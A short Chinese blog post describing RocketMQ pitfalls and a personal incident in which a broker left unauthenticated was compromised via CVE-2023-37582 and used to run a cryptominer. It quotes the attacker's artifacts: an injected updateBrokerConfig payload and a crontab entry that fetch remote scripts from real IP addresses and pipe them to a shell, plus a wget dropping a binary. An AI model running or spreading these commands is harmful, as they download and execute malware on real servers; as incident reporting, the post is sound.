Rocketmq的坑又来了
最好是同样的consumer有相同的消费tag
第一点就是常见的,consumer的tag,同一个consumer的group是会进行覆盖的,后面的consumer是会覆盖前面的,所以最好是同样的consumer有相同的消费tag。
Rocketmq 4.9.6以下有个漏洞,CVE-2023-37582,漏洞编号。
可以看到这个漏洞,如果mq有鉴权是不会触发的。但是mq坑的地方在于,如果启动的时候没有传入-c参数,他不会读取一个默认的配置文件,我猜测可能是读取的代码中默认配置。
有一次服务器异常,我启动mq的时候忘记加-c参数,导致mq没有密码暴露在互联网上了,就被人使用了这个漏洞,攻破了服务器,然后在我的服务器上跑挖矿的代码。
后来发现CPU使用异常,把挖矿的程序给停了。也不知道被人留后门没。
1、wget --no-check-certificate https://junmxiao.xyz/h5/java -O /tmp/.local/.-/java rocketmq 莫名有了这个
2、kdevtmpfsi 挖矿程序
3、攻破日志:
broker.log:2024-05-09 15:18:59 INFO AdminBrokerThread_16 - updateBrokerConfig, new config: [{filterServerNums=1, rocketmqHome=-c $@|sh . echo (curl -s 78.153.140.96/rm.sh||wget -q -O- 78.153.140.96/rm.sh)|bash;}] client: /78.153.140.30:49800
4、定时任务
crontab -l
-
-
-
-
- wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
-
-
-